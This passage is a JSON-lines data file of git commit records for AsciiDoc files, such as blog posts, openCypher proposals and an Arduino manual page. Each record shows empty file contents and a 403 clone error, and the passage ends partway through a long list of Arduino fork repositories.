403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4336d02d3519e1cf7d7e6c241854d2fe2dabb4","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc8e65ad65dab1e87d9b5ed845bb9891adfa670","subject":"Added CIP2018-10-29 EXISTS and IS NOT NULL","message":"Added CIP2018-10-29 EXISTS and IS NOT NULL\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2018-10-29-EXISTS-and-IS-NOT-NULL.adoc","new_file":"cip\/1.accepted\/CIP2018-10-29-EXISTS-and-IS-NOT-NULL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7840a3d1c37c98368f3f4a41583d02a3e30e530c","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cad194fc183dcf75e9893ca1db857b8a980551c9","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/03\/20\/deref.adoc","new_file":"content\/news\/2022\/03\/20\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"388c6da4e20c92ba30e0871b368c66a853b2b2ad","subject":"y2b create post What is the best RAM for a Mac? (MacBook Pro, iMac, Mac Mini)","message":"y2b create post What is the best RAM for a Mac? (MacBook Pro, iMac, Mac Mini)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-11-What-is-the-best-RAM-for-a-Mac-MacBook-Pro-iMac-Mac-Mini.adoc","new_file":"_posts\/2012-02-11-What-is-the-best-RAM-for-a-Mac-MacBook-Pro-iMac-Mac-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dcfce94f1d783a905f1c1e98f63116b363b350f","subject":"Update 2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","message":"Update 2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","repos":"sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io","old_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sskorol\/sskorol.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5f964c6f96077cd5657f77390465ecc06183a98","subject":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","message":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03ef74c60ff52a25881079919068f405d2571662","subject":"Naming pck","message":"Naming pck\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"916605a44e3ef01a5637788b9f5bfad4da04e754","subject":"y2b create post The New iPod Nano Watch Faces (iWatchz Carbon Unboxing \\u0026 Review)","message":"y2b create post The New iPod Nano Watch Faces (iWatchz Carbon Unboxing \\u0026 Review)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-07-The-New-iPod-Nano-Watch-Faces-iWatchz-Carbon-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-10-07-The-New-iPod-Nano-Watch-Faces-iWatchz-Carbon-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0e5e7efc77ec5b3dce06618e198cb3a75112fc4","subject":"Initial addition of CustomBuild and local STI testing","message":"Initial addition of CustomBuild and local STI testing\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"image_writers_guide\/sti_testing.adoc","new_file":"image_writers_guide\/sti_testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f84800b67294b3a38f6e7081a53b7faa2bacf22","subject":"details","message":"details\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"docs\/details.adoc","new_file":"docs\/details.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"398d00cc262b18b7a093ab95033c57be6d3b9b36","subject":"2016-07-13-narcissm.adoc","message":"2016-07-13-narcissm.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-13-narcissm.adoc","new_file":"_posts\/2016-07-13-narcissm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d99bcca2460449204af83508c8fc2d017723ceb","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5708520145522c1eeeeccf0f9f1f3b4ed18dae2","subject":"Quick Start tutorial to parse your first data source","message":"Quick Start tutorial to parse your first data source\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/quick-start.asciidoc","new_file":"docs\/quick-start.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"bb36fae7aa573281d78c1327750a15e22f582732","subject":"ASDF quick start","message":"ASDF quick start\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1c01864a4dc34d9980580c33c2e0b8e932aeeb81","subject":"Update 2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","message":"Update 2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","new_file":"_posts\/2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98574a9e1af021141b47ad23a313d3d7e38f3649","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-raml-console,gravitee-io\/gravitee-raml-console","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-raml-console.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"070a957d3461a62b2e30a4465186e882d46a8481","subject":"Update 2016-10-08-Elektron-Analog-Rytm-Arturia-DrumBrute-Tom-Cat-Feature-Comparison-Chart.adoc","message":"Update 2016-10-08-Elektron-Analog-Rytm-Arturia-DrumBrute-Tom-Cat-Feature-Comparison-Chart.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2016-10-08-Elektron-Analog-Rytm-Arturia-DrumBrute-Tom-Cat-Feature-Comparison-Chart.adoc","new_file":"_posts\/2016-10-08-Elektron-Analog-Rytm-Arturia-DrumBrute-Tom-Cat-Feature-Comparison-Chart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8af6acbbf5abec133ffd26a2e849e2099e851e48","subject":"Update 2016-04-06-Backups.adoc","message":"Update 2016-04-06-Backups.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Backups.adoc","new_file":"_posts\/2016-04-06-Backups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe2bec59b7eb0aa438086755a8f07bc61d67e89e","subject":"Add manual page","message":"Add manual page\n\nThis adds a description of commandline options, files used and some\npreferences in proper Unix manpage format. It is written in asciidoc,\nwhich can easily be converted to both a native troff manpage, or HTML\n(the latter can be done by github on-demand).\n","repos":"adamkh\/Arduino,andrealmeidadomingues\/Arduino,lukeWal\/Arduino,eduardocasarin\/Arduino,lulufei\/Arduino,jabezGit\/Arduino,EmuxEvans\/Arduino,eddyst\/Arduino-SourceCode,zenmanenergy\/Arduino,majenkotech\/Arduino,PaoloP74\/Arduino,tommyli2014\/Arduino,rcook\/DesignLab,drpjk\/Arduino,snargledorf\/Arduino,jomolinare\/Arduino,PaoloP74\/Arduino,danielchalef\/Arduino,niggor\/Arduino_cc,arduino-org\/Arduino,niggor\/Arduino_cc,jmgonzalez00449\/Arduino,ashwin713\/Arduino,drpjk\/Arduino,tskurauskas\/Arduino,gberl001\/Arduino,bsmr-arduino\/Arduino,tommyli2014\/Arduino,ektor5\/Arduino,toddtreece\/esp8266-Arduino,Cloudino\/Cloudino-Arduino-IDE,damellis\/Arduino,Chris--A\/Arduino,Protoneer\/Arduino,koltegirish\/Arduino,ricklon\/Arduino,eggfly\/arduino,shannonshsu\/Arduino,NeuralSpaz\/Arduino,tommyli2014\/Arduino,laylthe\/Arduino,Cloudino\/Cloudino-Arduino-IDE,ogahara\/Arduino,tskurauskas\/Arduino,bigjosh\/Arduino,aichi\/Arduino-2,laylthe\/Arduino,jaehong\/Xmegaduino,rcook\/DesignLab,gberl001\/Arduino,drpjk\/Arduino,danielchalef\/Arduino,tomkrus007\/Arduino,andyvand\/Arduino-1,tskurauskas\/Arduino,eduardocasarin\/Arduino,garci66\/Arduino,Gourav2906\/Arduino,jamesrob4\/Arduino,tomkrus007\/Arduino,shiitakeo\/Arduino,snargledorf\/Arduino,smily77\/Arduino,acosinwork\/Arduino,jaehong\/Xmegaduino,byran\/Arduino,cscenter\/Arduino,plaintea\/esp8266-Arduino,adamkh\/Arduino,byran\/Arduino,paulmand3l\/Arduino,ogferreiro\/Arduino,PaoloP74\/Arduino,paulo-raca\/ESP8266-Arduino,vbextreme\/Arduino,mc-hamster\/esp8266-Arduino,ricklon\/Arduino,bigjosh\/Arduino,SmartArduino\/Arduino-1,xxxajk\/Arduino-1,fungxu\/Arduino,adamkh\/Arduino,xxxajk\/Arduino-1,HCastano\/Arduino,aichi\/Arduino-2,jmgonzalez00449\/Arduino,me-no-dev\/Arduino-1,lukeWal\/Arduino,mateuszdw\/Arduino,jaej-dev\/Arduino,arunkuttiyara\/Arduino,danielchalef\/Arduino,ashwin713\/Arduino,ricklon\/Arduino,andrealmeidadomingues\/Arduino,NicoHood\/Arduino,jabezGit\/Arduino,paulo-raca\/ESP8266-Arduino,lukeWal\/Arduino,pdNor\/Arduino,raimohanska\/Arduino,nkolban\/Arduino,Chris--A\/Arduino,ashwin713\/Arduino,PaoloP74\/Arduino,pdNor\/Arduino,ccoenen\/Arduino,ricklon\/Arduino,xxxajk\/Arduino-1,andrealmeidadomingues\/Arduino,damellis\/Arduino,stevemayhew\/Arduino,Gourav2906\/Arduino,koltegirish\/Arduino,radut\/Arduino,noahchense\/Arduino-1,eddyst\/Arduino-SourceCode,garci66\/Arduino,Alfredynho\/AgroSis,arduino-org\/Arduino,zenmanenergy\/Arduino,OpenDevice\/Arduino,plinioseniore\/Arduino,gestrem\/Arduino,bigjosh\/Arduino,laylthe\/Arduino,NeuralSpaz\/Arduino,nkolban\/Arduino,talhaburak\/Arduino,chaveiro\/Arduino,pdNor\/Arduino,benwolfe\/esp8266-Arduino,tannewt\/Arduino,tskurauskas\/Arduino,gonium\/Arduino,ogferreiro\/Arduino,Cloudino\/Arduino,drpjk\/Arduino,wayoda\/Arduino,damellis\/Arduino,arduino-org\/Arduino,rcook\/DesignLab,ForestNymph\/Arduino_sources,majenkotech\/Arduino,jaehong\/Xmegaduino,ikbelkirasan\/Arduino,onovy\/Arduino,myrtleTree33\/Arduino,xxxajk\/Arduino-1,Protoneer\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,ashwin713\/Arduino,mattvenn\/Arduino,steamboating\/Arduino,zenmanenergy\/Arduino,raimohanska\/Arduino,HCastano\/Arduino,xxxajk\/Arduino-1,ccoenen\/Arduino,nandojve\/Arduino,rcook\/DesignLab,stickbreaker\/Arduino,ccoenen\/Arduino,OpenDevice\/Arduino,fungxu\/Arduino,ektor5\/Arduino,plaintea\/esp8266-Arduino,karlitxo\/Arduino,KlaasDeNys\/Arduino,PaoloP74\/Arduino,stickbreaker\/Arduino,radut\/Arduino,mateuszdw\/Arduino,wayoda\/Arduino,benwolfe\/esp8266-Arduino,zederson\/Arduino,EmuxEvans\/Arduino,adafruit\/ESP8266-Arduino,EmuxEvans\/Arduino,Chris--A\/Arduino,aichi\/Arduino-2,bigjosh\/Arduino,talhaburak\/Arduino,plinioseniore\/Arduino,acosinwork\/Arduino,scdls\/Arduino,Cloudino\/Arduino,koltegirish\/Arduino,Cloudino\/Arduino,Alfredynho\/AgroSis,byran\/Arduino,spapadim\/Arduino,adamkh\/Arduino,jamesrob4\/Arduino,ForestNymph\/Arduino_sources,noahchense\/Arduino-1,EmuxEvans\/Arduino,zaiexx\/Arduino,stevemarple\/Arduino-org,ari-analytics\/Arduino,Protoneer\/Arduino,adamkh\/Arduino,Protoneer\/Arduino,zaiexx\/Arduino,gestrem\/Arduino,tskurauskas\/Arduino,ikbelkirasan\/Arduino,OpenDevice\/Arduino,ari-analytics\/Arduino,Alfredynho\/AgroSis,kidswong999\/Arduino,stevemayhew\/Arduino,lulufei\/Arduino,snargledorf\/Arduino,tommyli2014\/Arduino,ari-analytics\/Arduino,ForestNymph\/Arduino_sources,majenkotech\/Arduino,ogferreiro\/Arduino,jmgonzalez00449\/Arduino,mangelajo\/Arduino,acosinwork\/Arduino,HCastano\/Arduino,probonopd\/Arduino,damellis\/Arduino,bsmr-arduino\/Arduino,cscenter\/Arduino,me-no-dev\/Arduino-1,adafruit\/ESP8266-Arduino,ogferreiro\/Arduino,ikbelkirasan\/Arduino,Chris--A\/Arduino,NaSymbol\/Arduino,lukeWal\/Arduino,smily77\/Arduino,OpenDevice\/Arduino,sanyaade-iot\/Arduino-1,piersoft\/esp8266-Arduino,xxxajk\/Arduino-1,mangelajo\/Arduino,kidswong999\/Arduino,EmuxEvans\/Arduino,jaehong\/Xmegaduino,plinioseniore\/Arduino,chaveiro\/Arduino,spapadim\/Arduino,ikbelkirasan\/Arduino,henningpohl\/Arduino,ogahara\/Arduino,mateuszdw\/Arduino,paulmand3l\/Arduino,chaveiro\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,ektor5\/Arduino,weera00\/Arduino,bigjosh\/Arduino,superboonie\/Arduino,tommyli2014\/Arduino,vbextreme\/Arduino,wdoganowski\/Arduino,sanyaade-iot\/Arduino-1,sanyaade-iot\/Arduino-1,wilhelmryan\/Arduino,ForestNymph\/Arduino_sources,NaSymbol\/Arduino,ogferreiro\/Arduino,laylthe\/Arduino,wdoganowski\/Arduino,weera00\/Arduino,jaimemaretoli\/Arduino,stevemarple\/Arduino-org,paulo-raca\/ESP8266-Arduino,aichi\/Arduino-2,eggfly\/arduino,noahchense\/Arduino-1,mattvenn\/Arduino,kidswong999\/Arduino,bigjosh\/Arduino,weera00\/Arduino,PaoloP74\/Arduino,ntruchsess\/Arduino-1,nandojve\/Arduino,onovy\/Arduino,stevemayhew\/Arduino,arunkuttiyara\/Arduino,steamboating\/Arduino,PeterVH\/Arduino,tbowmo\/Arduino,raimohanska\/Arduino,tskurauskas\/Arduino,danielchalef\/Arduino,steamboating\/Arduino,wilhelmryan\/Arduino,Cloudino\/Arduino,mateuszdw\/Arduino,zenmanenergy\/Arduino,onovy\/Arduino,gestrem\/Arduino,tskurauskas\/Arduino,stevemayhew\/Arduino,majenkotech\/Arduino,ogahara\/Arduino,piersoft\/esp8266-Arduino,aichi\/Arduino-2,jabezGit\/Arduino,myrtleTree33\/Arduino,ssvs111\/Arduino,nkolban\/Arduino,rcook\/DesignLab,mc-hamster\/esp8266-Arduino,chaveiro\/Arduino,ricklon\/Arduino,lukeWal\/Arduino,jaimemaretoli\/Arduino,Cloudino\/Arduino,jaej-dev\/Arduino,leftbrainstrain\/Arduino-ESP8266,nandojve\/Arduino,toddtreece\/esp8266-Arduino,nandojve\/Arduino,zaiexx\/Arduino,eggfly\/arduino,tbowmo\/Arduino,niggor\/Arduino_cc,UDOOboard\/Arduino,karlitxo\/Arduino,gonium\/Arduino,arduino-org\/Arduino,tannewt\/Arduino,zenmanenergy\/Arduino,shannonshsu\/Arduino,gestrem\/Arduino,ssvs111\/Arduino,cscenter\/Arduino,HCastano\/Arduino,plaintea\/esp8266-Arduino,Gourav2906\/Arduino,sanyaade-iot\/Arduino-1,eggfly\/arduino,Protoneer\/Arduino,noahchense\/Arduino-1,Alfredynho\/AgroSis,Gourav2906\/Arduino,Protoneer\/Arduino,nkolban\/Arduino,eddyst\/Arduino-SourceCode,rcook\/DesignLab,mc-hamster\/esp8266-Arduino,jaej-dev\/Arduino,ogahara\/Arduino,talhaburak\/Arduino,scdls\/Arduino,Protoneer\/Arduino,kidswong999\/Arduino,KlaasDeNys\/Arduino,mangelajo\/Arduino,me-no-dev\/Arduino-1,mattvenn\/Arduino,jabezGit\/Arduino,bsmr-arduino\/Arduino,stickbreaker\/Arduino,henningpohl\/Arduino,stevemarple\/Arduino-org,NicoHood\/Arduino,fungxu\/Arduino,bsmr-arduino\/Arduino,vbextreme\/Arduino,danielchalef\/Arduino,mangelajo\/Arduino,cscenter\/Arduino,ikbelkirasan\/Arduino,noahchense\/Arduino-1,stevemarple\/Arduino-org,wayoda\/Arduino,lukeWal\/Arduino,tomkrus007\/Arduino,toddtreece\/esp8266-Arduino,mboufos\/esp8266-Arduino,ari-analytics\/Arduino,leftbrainstrain\/Arduino-ESP8266,zaiexx\/Arduino,gurbrinder\/Arduino,jmgonzalez00449\/Arduino,superboonie\/Arduino,me-no-dev\/Arduino-1,nandojve\/Arduino,EmuxEvans\/Arduino,SmartArduino\/Arduino-1,noahchense\/Arduino-1,NaSymbol\/Arduino,gberl001\/Arduino,ashwin713\/Arduino,gurbrinder\/Arduino,bsmr-arduino\/Arduino,nkolban\/Arduino,myrtleTree33\/Arduino,talhaburak\/Arduino,gurbrinder\/Arduino,jamesrob4\/Arduino,kidswong999\/Arduino,leftbrainstrain\/Arduino-ESP8266,eduardocasarin\/Arduino,eddyst\/Arduino-SourceCode,benwolfe\/esp8266-Arduino,Chris--A\/Arduino,UDOOboard\/Arduino,shannonshsu\/Arduino,jaehong\/Xmegaduino,smily77\/Arduino,zenmanenergy\/Arduino,tbowmo\/Arduino,scdls\/Arduino,jabezGit\/Arduino,tomkrus007\/Arduino,acosinwork\/Arduino,arduino-org\/Arduino,ntruchsess\/Arduino-1,nandojve\/Arduino,myrtleTree33\/Arduino,eddyst\/Arduino-SourceCode,scdls\/Arduino,NaSymbol\/Arduino,superboonie\/Arduino,spapadim\/Arduino,karlitxo\/Arduino,mateuszdw\/Arduino,gurbrinder\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,danielchalef\/Arduino,PeterVH\/Arduino,ssvs111\/Arduino,byran\/Arduino,wilhelmryan\/Arduino,karlitxo\/Arduino,adafruit\/ESP8266-Arduino,eddyst\/Arduino-SourceCode,ashwin713\/Arduino,shiitakeo\/Arduino,ntruchsess\/Arduino-1,majenkotech\/Arduino,probonopd\/Arduino,plinioseniore\/Arduino,Chris--A\/Arduino,ssvs111\/Arduino,eggfly\/arduino,fungxu\/Arduino,mc-hamster\/esp8266-Arduino,paulo-raca\/ESP8266-Arduino,myrtleTree33\/Arduino,sanyaade-iot\/Arduino-1,rcook\/DesignLab,talhaburak\/Arduino,Cloudino\/Arduino,Gourav2906\/Arduino,KlaasDeNys\/Arduino,tommyli2014\/Arduino,pdNor\/Arduino,tannewt\/Arduino,mangelajo\/Arduino,gberl001\/Arduino,stevemayhew\/Arduino,NeuralSpaz\/Arduino,garci66\/Arduino,arunkuttiyara\/Arduino,paulo-raca\/ESP8266-Arduino,adafruit\/ESP8266-Arduino,zederson\/Arduino,gonium\/Arduino,niggor\/Arduino_cc,PaoloP74\/Arduino,ikbelkirasan\/Arduino,KlaasDeNys\/Arduino,jaej-dev\/Arduino,NicoHood\/Arduino,andyvand\/Arduino-1,tomkrus007\/Arduino,wdoganowski\/Arduino,jomolinare\/Arduino,UDOOboard\/Arduino,byran\/Arduino,gestrem\/Arduino,paulo-raca\/ESP8266-Arduino,ntruchsess\/Arduino-1,lulufei\/Arduino,aichi\/Arduino-2,lukeWal\/Arduino,henningpohl\/Arduino,tbowmo\/Arduino,superboonie\/Arduino,KlaasDeNys\/Arduino,niggor\/Arduino_cc,Gourav2906\/Arduino,raimohanska\/Arduino,noahchense\/Arduino-1,gonium\/Arduino,Alfredynho\/AgroSis,PeterVH\/Arduino,jaimemaretoli\/Arduino,byran\/Arduino,wdoganowski\/Arduino,shannonshsu\/Arduino,jaimemaretoli\/Arduino,Chris--A\/Arduino,superboonie\/Arduino,jamesrob4\/Arduino,mboufos\/esp8266-Arduino,SmartArduino\/Arduino-1,andrealmeidadomingues\/Arduino,ikbelkirasan\/Arduino,PeterVH\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,mangelajo\/Arduino,gestrem\/Arduino,NicoHood\/Arduino,NeuralSpaz\/Arduino,onovy\/Arduino,OpenDevice\/Arduino,weera00\/Arduino,gberl001\/Arduino,eeijcea\/Arduino-1,SmartArduino\/Arduino-1,gberl001\/Arduino,plinioseniore\/Arduino,eddyst\/Arduino-SourceCode,zederson\/Arduino,mc-hamster\/esp8266-Arduino,SmartArduino\/Arduino-1,niggor\/Arduino_cc,OpenDevice\/Arduino,ogahara\/Arduino,ari-analytics\/Arduino,superboonie\/Arduino,ektor5\/Arduino,ari-analytics\/Arduino,garci66\/Arduino,Cloudino\/Cloudino-Arduino-IDE,stickbreaker\/Arduino,paulmand3l\/Arduino,gonium\/Arduino,spapadim\/Arduino,andrealmeidadomingues\/Arduino,stevemarple\/Arduino-org,weera00\/Arduino,ricklon\/Arduino,fungxu\/Arduino,leftbrainstrain\/Arduino-ESP8266,UDOOboard\/Arduino,shannonshsu\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,HCastano\/Arduino,PaoloP74\/Arduino,ektor5\/Arduino,NaSymbol\/Arduino,jaej-dev\/Arduino,stickbreaker\/Arduino,paulo-raca\/ESP8266-Arduino,zaiexx\/Arduino,NeuralSpaz\/Arduino,shiitakeo\/Arduino,SmartArduino\/Arduino-1,wilhelmryan\/Arduino,byran\/Arduino,bsmr-arduino\/Arduino,vbextreme\/Arduino,arunkuttiyara\/Arduino,NicoHood\/Arduino,snargledorf\/Arduino,adamkh\/Arduino,probonopd\/Arduino,jamesrob4\/Arduino,eeijcea\/Arduino-1,Alfredynho\/AgroSis,drpjk\/Arduino,talhaburak\/Arduino,superboonie\/Arduino,garci66\/Arduino,mateuszdw\/Arduino,eduardocasarin\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,tannewt\/Arduino,steamboating\/Arduino,arduino-org\/Arduino,SmartArduino\/Arduino-1,damellis\/Arduino,raimohanska\/Arduino,piersoft\/esp8266-Arduino,mattvenn\/Arduino,cscenter\/Arduino,pdNor\/Arduino,NeuralSpaz\/Arduino,steamboating\/Arduino,cscenter\/Arduino,vbextreme\/Arduino,scdls\/Arduino,eduardocasarin\/Arduino,koltegirish\/Arduino,OpenDevice\/Arduino,ForestNymph\/Arduino_sources,wayoda\/Arduino,andrealmeidadomingues\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,weera00\/Arduino,shiitakeo\/Arduino,gurbrinder\/Arduino,kidswong999\/Arduino,ntruchsess\/Arduino-1,tskurauskas\/Arduino,chaveiro\/Arduino,talhaburak\/Arduino,raimohanska\/Arduino,jabezGit\/Arduino,xxxajk\/Arduino-1,ccoenen\/Arduino,acosinwork\/Arduino,superboonie\/Arduino,wdoganowski\/Arduino,KlaasDeNys\/Arduino,ccoenen\/Arduino,paulmand3l\/Arduino,arunkuttiyara\/Arduino,EmuxEvans\/Arduino,koltegirish\/Arduino,mattvenn\/Arduino,paulmand3l\/Arduino,radut\/Arduino,lukeWal\/Arduino,adamkh\/Arduino,jomolinare\/Arduino,NicoHood\/Arduino,scdls\/Arduino,stevemayhew\/Arduino,tomkrus007\/Arduino,NicoHood\/Arduino,eggfly\/arduino,Alfredynho\/AgroSis,andyvand\/Arduino-1,andyvand\/Arduino-1,radut\/Arduino,NaSymbol\/Arduino,onovy\/Arduino,spapadim\/Arduino,arunkuttiyara\/Arduino,chaveiro\/Arduino,acosinwork\/Arduino,jmgonzalez00449\/Arduino,jomolinare\/Arduino,drpjk\/Arduino,UDOOboard\/Arduino,Cloudino\/Cloudino-Arduino-IDE,shannonshsu\/Arduino,henningpohl\/Arduino,garci66\/Arduino,NaSymbol\/Arduino,garci66\/Arduino,PeterVH\/Arduino,stevemayhew\/Arduino,gonium\/Arduino,zederson\/Arduino,andyvand\/Arduino-1,karlitxo\/Arduino,mboufos\/esp8266-Arduino,ari-analytics\/Arduino,paulmand3l\/Arduino,probonopd\/Arduino,stevemarple\/Arduino-org,laylthe\/Arduino,lulufei\/Arduino,ogferreiro\/Arduino,me-no-dev\/Arduino-1,UDOOboard\/Arduino,tomkrus007\/Arduino,stickbreaker\/Arduino,henningpohl\/Arduino,laylthe\/Arduino,tommyli2014\/Arduino,andyvand\/Arduino-1,smily77\/Arduino,eeijcea\/Arduino-1,nandojve\/Arduino,ntruchsess\/Arduino-1,majenkotech\/Arduino,Peter